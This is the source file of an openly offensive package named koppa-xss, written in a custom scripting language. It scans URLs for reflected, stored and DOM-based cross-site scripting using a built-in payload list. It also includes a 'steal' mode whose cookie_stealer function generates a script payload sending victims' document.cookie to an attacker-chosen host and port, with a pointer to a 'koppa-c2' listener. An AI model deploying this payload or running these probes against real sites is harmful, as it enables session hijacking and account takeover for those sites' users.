## koppa package: koppa-xss
## version: 1.0.0
## description: XSS scanner — reflected, stored, DOM, polyglot, CSP bypass, steal cookies
## author: KOPPA-OS
## tags: web, xss, injection, javascript

import net, log, sys, crypt

let PAYLOADS = [
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "\"><script>alert(1)</script>",
    "'><script>alert(1)</script>",
    "<svg onload=alert(1)>",
    "javascript:alert(1)",
    "<body onload=alert(1)>",
    "'\"><img src=x onerror=alert`1`>",
    "<details open ontoggle=alert(1)>",
    "<%2Fscript><script>alert(1)<%2Fscript>"
]
let DOM_SOURCES  = ["document.URL", "location.hash", "location.search", "document.referrer"]
let DOM_SINKS    = ["innerHTML", "document.write", "eval(", "setTimeout(", "location.href"]

fn scan_reflected(url, param) {
    log.info("[*] Reflected XSS scan: " + url)
    let tag = "koppa" + crypt.random_hex(4)
    let found = []
    for pay in PAYLOADS {
        let p    = pay.replace("alert(1)", "alert('" + tag + "')")
        let resp = net.http_get(url + "?" + param + "=" + net.url_encode(p))
        if resp.body.contains(p) or resp.body.contains(tag) {
            log.ok("[+] Reflected XSS!  Payload: " + p)
            found.push(p)
        }
    }
    if found.len() == 0 { log.muted("[-] No reflected XSS found") }
    return found
}

fn scan_stored(url_post, url_view, field) {
    log.info("[*] Stored XSS scan: POST→" + url_post + " VIEW→" + url_view)
    let tag = "koppa" + crypt.random_hex(4)
    for pay in PAYLOADS {
        let p = pay.replace("alert(1)", "alert('" + tag + "')")
        net.http_post(url_post, { field: p })
        let resp = net.http_get(url_view)
        if resp.body.contains(p) or resp.body.contains(tag) {
            log.ok("[+] Stored XSS!  Payload: " + p)
            return p
        }
    }
    log.muted("[-] No stored XSS found")
    return ""
}

fn scan_dom(url) {
    log.info("[*] DOM XSS scan: " + url)
    let src = net.http_get(url).body
    for source in DOM_SOURCES {
        for sink in DOM_SINKS {
            if src.contains(source) and src.contains(sink) {
                log.ok("[+] Potential DOM XSS: " + source + " → " + sink)
            }
        }
    }
}

fn cookie_stealer(lhost, lport) {
    log.info("[*] XSS cookie stealer payload:")
    let pay = "<script>new Image().src='http://" + lhost + ":" + lport + "/?c='+document.cookie</script>"
    log.ok("[+] " + pay)
    log.muted("    Start listener: koppa-c2 " + lhost + " " + lport)
    return pay
}

fn main(args) {
    log.info("[koppa-xss] XSS Scanner v1.0")
    let url   = args[0] or sys.prompt("URL: ")
    let mode  = args[1] or "reflected"
    let param = args[2] or "q"
    if mode == "reflected" { scan_reflected(url, param) }
    if mode == "stored" {
        let view = args[3] or sys.prompt("View URL: ")
        scan_stored(url, view, param)
    }
    if mode == "dom"    { scan_dom(url) }
    if mode == "steal"  {
        let lh = args[2] or sys.prompt("LHOST: ")
        let lp = args[3] or sys.prompt("LPORT: ")
        cookie_stealer(lh, lp)
    }
}
